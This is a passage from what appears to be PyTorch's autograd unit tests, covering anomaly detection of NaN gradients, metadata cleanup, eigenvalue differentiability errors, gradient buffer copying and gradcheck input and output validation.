out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
# We can test this by seeing whether Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
# since if PyObject is not destroyed here, wouldn't this test would detect that also?
# The answer is that custom function's PyObject (THPFunction) actually only hold
# a weak reference to the c++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contigous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and value, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when mkldnn inputs, forward mode testing is not allowed
# Update tolerances below to make sure the gradient match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def test_gradcheck_forward_ad_runs_with_no_requires_grad(self):
# Currently requires_grad is used as a easy way for gradcheck to know
# which inputs of the function are meant to be differentiable
# This test checks that when the inputs are passed to the function they should not have
# requires_grad=True even though they may have requires_grad=True when passed
# to gradcheck
class UserFn(Function):
@staticmethod
def forward(ctx, x, y):
if fwAD._current_level >= 0:
self.assertFalse(x.requires_grad)
self.assertFalse(y.requires_grad)
return x.clone(), y.clone()
@staticmethod
def jvp(ctx, x_t, y_t):
return x_t, y_t
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=False, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=False)
gradcheck(UserFn.apply, (x, y), check_forward_ad=True, check_undefined_grad=True, check_backward_ad=False,
check_batched_grad=False, check_batched_forward_grad=True)
def test_gradcheck_forward_ad_respects_requires_grad(self):
# Currently requires_grad is used as a easy way for gradcheck to know
# which inputs of the function are meant to be differentiable
jvp_count = [0]
class UserFn(Function):
@staticmethod
def forward(ctx, x, y):
return x.clone(), y.clone()
@staticmethod
def jvp(ctx, x_t, y_t):
jvp_count[0] += 1
return x_t, y_t
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
